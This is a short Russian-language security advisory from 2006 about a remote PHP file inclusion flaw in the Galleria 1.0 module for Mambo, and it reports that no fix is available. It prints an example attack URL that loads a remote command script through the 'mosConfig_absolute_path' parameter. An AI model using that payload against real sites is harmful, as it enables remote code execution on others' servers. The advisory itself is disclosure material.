PHP-инклюдинг в модуле Mambo Galleria

Дата публикации:
05.07.2006
Всего просмотров:
4019
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Galleria 1.x (модуль к Mambo)
Уязвимые версии: Galleria 1.0 (модуль к Mambo), возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии galleria.html.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для успешной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://[target]/[path]/components/com_galleria/galleria.html.php
?mosConfig_absolute_path=http://[f*ckscript]/cmd.txt?&cmd=

URL производителя: binarydigit.at

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: galleria <= 1.0 Remote File Inclusion Vulnerability

или введите имя

CAPTCHA